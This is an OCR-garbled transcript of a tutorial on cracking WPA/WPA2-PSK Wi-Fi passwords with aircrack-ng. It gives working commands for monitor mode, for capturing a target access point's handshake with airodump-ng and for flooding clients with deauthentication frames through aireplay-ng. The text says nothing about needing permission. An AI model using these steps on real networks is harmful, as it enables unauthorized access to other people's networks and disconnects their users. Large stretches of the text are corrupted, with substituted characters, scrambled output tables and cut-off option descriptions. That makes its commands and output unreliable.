Crack Wi-Fi With WPA_WPA2-PSK Using Aircrack-ng

8/12/2019 Crack Wi-Fi With WPA_WPA2-PSK Using Aircrack-ng

1/5

Crack Wi-Fi with WPA/WPA2-PSKusing Aircrack-ng

This article is a summary of effective commands that just work.

With the help a these commands you will be able to crack WPA/WPA2 Wi- i AccessPointswhich use P!" #Pre-!hared "ey$ encryption.

The objective is to capture the WPA/WPA2 authentication handshake and then crack theP!" usin% aircrack-ng .

The full tutorial about WPA/WPA2 crackin% can be found here .

&ere are the basic steps we will be %oin% throu%h'

(. )nstall the latest aircrack-ng *. !tart the wireless interface in monitor mode usin% airmon-ng 2. !tart airodump-ng on AP channel with filter for +!!), to collect authentication

handshake . ptional0 1se aireplay-ng to deauthenticate the wireless client . 3un aircrack-ng to crack the WPA/WPA2-P!" usin% the authentication handshake

0. Install the Latest Aircrack-ng)nstall the re4uired dependencies '

$ sudo apt-get install build-essential libssl-dev pkg-config

,ownload and install the latest aircrack-n% '

$ wget http://download.aircrack-ng.org/aircrack-ng-1.2-beta3.tar.gz

$ cd aircrack-ng-1.2-beta3

$ sudo make

$ sudo make install

+e sure to check that the version of aircrack-ng is up-to-date because you may seeproblems with older versions.

$ aircrack - ng -- help head - 3

!ircrack - ng 1.2 beta3 r23"3 - # % 2&&' - 2&13 (homas d )*treppe http://www.aircrack-ng.org
http://www.aircrack-ng.org/doku.php?id=cracking_wpahttp://www.aircrack-ng.org/doku.php?id=install_aircrackhttp://www.aircrack-ng.org/doku.php?id=install_aircrackhttp://www.aircrack-ng.org/doku.php?id=cracking_wpa


2/5

1. Start the Wireless Interface in !nit!r !"eind and stop all processes that could cause trouble '

$ sudo airmon-ng check kill

!tart the wireless interface in monitor mode '

$ sudo airmon-ng start wlan&

5otice that airmon-ng enabled monitor-mode on mon( '

+nterface hipset ,river

wlan& +ntel '23 iwlwifi - ph &0

#monitor mode enabled on mon& %

!o6 the correct interface name to use in later parts of the tutorial is mon(.

2. Start Air!"u#$-ng t! C!llect Authenticati!n%an"shake&!w' when !ur wireless a"a$ter is in #!nit!r #!"e' we ha(e the ca$a)ilit* t!see all the wireless traffic that $asses )* in the air.

)t can be done with airodump-ng command '$ sudo airodump-ng mon&

All of the visible APs are listed in the upper part of the screen and the clients are listed inthe lower part of the screen '

1 0 lapsed : 2& s 0 2&1 - & - 2" 12 : '

455+, 678 4eacons 9,ata 9/s ;4 < +6 8 !=( 55+,

&&: 11 : 22 : 33 : : - > 212 1 3' '' 1 e 76!2 ;6 65?rack;e

'' : @@: >>: "" : &&: 11 - ' 13 3 3 1 e 76!2 ;6 65? 5ome!6

455+, 5(!(+*< 678 8ate Aost Brames 6robe

&&: 11 : 22 : 33 : : !! : 44 : : ,, : : BB - & - 1 11 '&&: 11 : 22 : 33 : : CC : : ++: DD: ?? : AA - @> & - 1 & 1'' : @@: >>: "" : &&: 11 ;; :


3/5

5ow start airodump-ng on AP channel with filter for +!!), to collect authenticationhandshake for the access point we are interested in '

7 sudo airodump-n% -c * --bssid (('**'22' ' '88 -w WPAcrack mon( 9i%nore-ne%ative-one

+$ti!n ,escri$ti!n-c The channel for the wireless network

--bssid The :A; address of the access point

-w The file name prefi< for the file which will containauthentication handshake

mon( The wireless interface

--i%nore-ne%ative-

one3emoves =fi if you want toforce this process.

After some time you=ll notice the in the top ri%ht-hand corner of the screen.

This means airodump-ng has successfully captured the handshake.

1 0 lapsed : 2& s 0 2&1 - & - 2" 12 : ' 76! handshake : &&: 11 : 22 : 33 : :

455+, 678 4eacons 9,ata 9/s ;4 < +6 8 !=( 55+,

&&: 11 : 22 : 33 : : - > 212 1 3' '' 1 e 76!2 ;6 65?rack;e

455+, 5(!(+*< 678 8ate Aost Brames 6robe

&&: 11 : 22 : 33 : : !! : 44 : : ,, : : BB - & - 1 11 '

. +$ti!nal se Aire$la*-ng t!

,eauthenticate the Wireless ClientThis step is optional. )f you can=t wait till airodump-ng captures a handshake6 you cansend a messa%e to the wireless client sayin% that it is no lon%er associated with the AP.The wireless client will then hopefully reauthenticate with the AP and we=ll capture theauthentication handshake.

!end ,eAuth to broadcast '

$ sudo airepla -ng --deauth 1&& -a &&:11:22:33: : mon& --ignore-negative-one


4/5

!end directed ,eAuth #attack is more effective when it is tar%eted$ '

$ sudo airepla -ng --deauth 1&& -a &&:11:22:33: : -c !!:44: :,,: :BB mon& --ignore-

negative-one

+$ti!n ,escri$ti!n--deauth *(( The number of de-authenticate frames you want tosend #( for unlimited$

-a The :A; address of the access point

-c The :A; address of the client

mon( The wireless interface

--i%nore-ne%ative-one 3emoves =fi && "3 ! > ,, & @@ !3 !1 @, 1 ,

(ransient ?e : 3! 3 2@ >' 3 &1 !> "1 ! 2, @ "@ @1 ,2 B>!! &3 > "" 4B !@ 32 4 2B , "3 & 4 4 B',4 !3 @ 3 '2 B 11 3 ' ,! 4! 3> 2" @2 , 4"!3 11 @ !' >B "& '3 ' 14 &3 >" @2 @" "" 21 43

!6*A ;! : "B 4 B 4" 3 >4 ! ,B !& 3 B , ", B 1' '2
http://www.insidepro.com/dictionaries.phphttp://www.insidepro.com/dictionaries.php


5/5

Crack Wi-Fi With WPA_WPA2-PSK Using Aircrack-ng

Documents

Transcript of Crack Wi-Fi With WPA_WPA2-PSK Using Aircrack-ng